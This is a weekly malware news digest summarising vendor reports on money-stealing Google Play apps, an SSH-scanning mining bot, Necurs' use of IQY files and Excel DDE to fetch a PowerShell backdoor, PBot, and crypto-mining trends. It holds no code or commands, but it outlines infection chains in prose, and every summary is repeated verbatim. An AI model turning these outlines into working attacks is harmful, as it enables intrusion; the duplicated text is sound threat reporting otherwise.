Malware Watch - W/E - 062918
Malicious Google Play Apps Connected to AsiaHitGroup Gang (06/28/2018)
McAfee uncovered 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. All of the apps, including one that claimed to be the Despacito ringtone app and had been downloaded 50,000 times, steal money from unsuspecting victims. In this campaign, the AsiaHitGroup Gang targeted users in Kazakhstan, Malaysia, and Russia.
McAfee uncovered 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. All of the apps, including one that claimed to be the Despacito ringtone app and had been downloaded 50,000 times, steal money from unsuspecting victims. In this campaign, the AsiaHitGroup Gang targeted users in Kazakhstan, Malaysia, and Russia.
Mining Bot Takes Aim at Devices Running Secure Shell (06/27/2018)
Trend Micro's honeypot sensors picked up a mining bot related to the IP address 192.158.228.46. The address has been spotted searching for both Secure Shell (SSH)- and Internet of Things-related ports, including 22, 2222, and 502. One particular attack hit port 22, the SSH service. The bot searches for devices that have an open Remote Desktop Protocol port, which enables the attacker to take advantage of vulnerable devices. Once the attacker identifies a device to infect, it tries to run a wget command to download a script to a directory that will subsequently run the script and install the malware.
Trend Micro's honeypot sensors picked up a mining bot related to the IP address 192.158.228.46. The address has been spotted searching for both Secure Shell (SSH)- and Internet of Things-related ports, including 22, 2222, and 502. One particular attack hit port 22, the SSH service. The bot searches for devices that have an open Remote Desktop Protocol port, which enables the attacker to take advantage of vulnerable devices. Once the attacker identifies a device to infect, it tries to run a wget command to download a script to a directory that will subsequently run the script and install the malware.
Necurs Gets Stealthier with Abuse of Internet Query File (06/27/2018)
The operators of the Necurs botnet have updated the malware to use the Internet query file IQY to slip past detection. IQY files are meant to allow users to import data from external sources to the user's Excel spreadsheet. By default, Windows recognizes IQY files as Excel Web Query Files and automatically executes them in Excel. Once the user executes the IQY file it queries to the URL indicated in its code, the Web query file pulls data from the targeted URL into an Excel worksheet. The pulled data contains a script to abuse Excel's Dynamic Data Exchange feature, enabling it to execute a command line that begins a PowerShell process. This process allows the fileless execution of the remote PowerShell script, which then downloads a Trojanized remote access application, and its final payload: the backdoor FlawedAMMYY. This information comes from Trend Micro. In a second post, Trend Micro addresses other changes that have been made to Necurs.
The operators of the Necurs botnet have updated the malware to use the Internet query file IQY to slip past detection. IQY files are meant to allow users to import data from external sources to the user's Excel spreadsheet. By default, Windows recognizes IQY files as Excel Web Query Files and automatically executes them in Excel. Once the user executes the IQY file it queries to the URL indicated in its code, the Web query file pulls data from the targeted URL into an Excel worksheet. The pulled data contains a script to abuse Excel's Dynamic Data Exchange feature, enabling it to execute a command line that begins a PowerShell process. This process allows the fileless execution of the remote PowerShell script, which then downloads a Trojanized remote access application, and its final payload: the backdoor FlawedAMMYY. This information comes from Trend Micro. In a second post, Trend Micro addresses other changes that have been made to Necurs.
PBot Evolves from Adware to Include Mining Feature (06/27/2018)
Several modifications of the PBot (PythonBot) adware have occurred since the malware was first detected and Kaspersky Lab warned that it now employs a hidden cryptocurrency miner. In April, there were more than 50,000 instances where PBot attempted installs on computers that were running Kaspersky products. PBot's target audience is mainly in Russia, Ukraine, and Kazakhstan and it uses various technologies to remain obfuscated.
Several modifications of the PBot (PythonBot) adware have occurred since the malware was first detected and Kaspersky Lab warned that it now employs a hidden cryptocurrency miner. In April, there were more than 50,000 instances where PBot attempted installs on computers that were running Kaspersky products. PBot's target audience is mainly in Russia, Ukraine, and Kazakhstan and it uses various technologies to remain obfuscated.
Proofpoint Assesses the Rise of Cryptocurrency Mining Malware (06/27/2018)
Proofpoint analyzed the trends surrounding cryptocurrency mining and the current state of this malware in a blog post. According to the research, Locky introduced ransomware at a massive scale in 2016 and this helped to pave the way for new ransomware strains which then led to the introduction of cryptocurrency mining. One takeaway from the data is that typical banking Trojans, most notably, The Trick, have added cryptocurrency mining features to the primary payload.
Proofpoint analyzed the trends surrounding cryptocurrency mining and the current state of this malware in a blog post. According to the research, Locky introduced ransomware at a massive scale in 2016 and this helped to pave the way for new ransomware strains which then led to the introduction of cryptocurrency mining. One takeaway from the data is that typical banking Trojans, most notably, The Trick, have added cryptocurrency mining features to the primary payload.
Report Finds Sobering Growth in Malicious Cryptocurrency Mining (06/27/2018)
Kaspersky Lab has found that the number of Internet users attacked by malicious cryptocurrency mining software has increased from 1.9 million to 2.7 million in just one year. Mobile cryptocurrency miner attacks grew by 9.5% and targeted 5,000 users between 2017-2018, as compared to 4,500 users between 2016-2017. These details come from a new ransomware and malicious crypto miners report from Kaspersky Lab.
Kaspersky Lab has found that the number of Internet users attacked by malicious cryptocurrency mining software has increased from 1.9 million to 2.7 million in just one year. Mobile cryptocurrency miner attacks grew by 9.5% and targeted 5,000 users between 2017-2018, as compared to 4,500 users between 2016-2017. These details come from a new ransomware and malicious crypto miners report from Kaspersky Lab.